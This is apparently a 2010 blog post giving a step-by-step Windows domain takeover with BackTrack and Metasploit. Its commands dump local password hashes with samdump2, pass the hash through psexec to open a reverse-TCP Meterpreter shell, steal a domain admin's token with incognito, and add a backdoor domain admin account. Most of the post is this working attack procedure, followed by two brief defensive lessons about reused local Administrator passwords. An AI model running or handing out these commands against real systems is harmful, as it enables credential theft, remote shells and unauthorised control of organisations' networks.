How to own a Windows Domain 2.0

February 20th, 2010 by Dev Team in Privilege Escalation, windows

Back in October we showed a video on how to own a Windows domain by passing the hash of the local Administrator account to a server in the domain and using it to add a new domain admin account. This newer version makes the task much easier using BackTrack 4 and Metasploit.

The commands used in the video (host addresses and the hash are left blank or shortened, as in the video):

Dump the local account hashes from the mounted Windows disk (the SYSTEM hive supplies the boot key that unlocks the SAM):
mount /dev/sda1 /mnt/sda1
cd /mnt/sda1/WINDOWS/system32/config
samdump2 system SAM

In msfconsole, authenticate to the target over SMB with the dumped LM:NT hash instead of a password and run a Meterpreter payload as a background job:
use windows/smb/psexec
exploit -p windows/meterpreter/reverse_tcp -o LHOST=,LPORT=6789,RHOST=,SMBUser=Administrator,SMBPass=123...:5654... -j

In the resulting Meterpreter session, load incognito (load incognito in later Metasploit releases), list the logon tokens present on the box and steal the domain admin's:
sessions -i 1
use incognito
list_tokens -u
impersonate_token mydomain\\domainadmin

Spawn a shell under the impersonated token (-t) and create a new domain admin:
execute -f cmd.exe -i -t
net user hack MPass5678 /add /domain
net group "Domain Admins" hack /add /domain

Lessons learned:
1. Never reuse the local Administrator password across machines, even if it is technically uncrackable. The attacker never cracks it: the NT hash read out of the SAM is enough to authenticate, so password strength does not matter. And once a domain admin has logged on to a box where that hash works, their token is there for the taking.
2. Everything is a lot easier with the right tools.

The attack works against Windows XP, Vista, 7, Server 2003 and Server 2008.
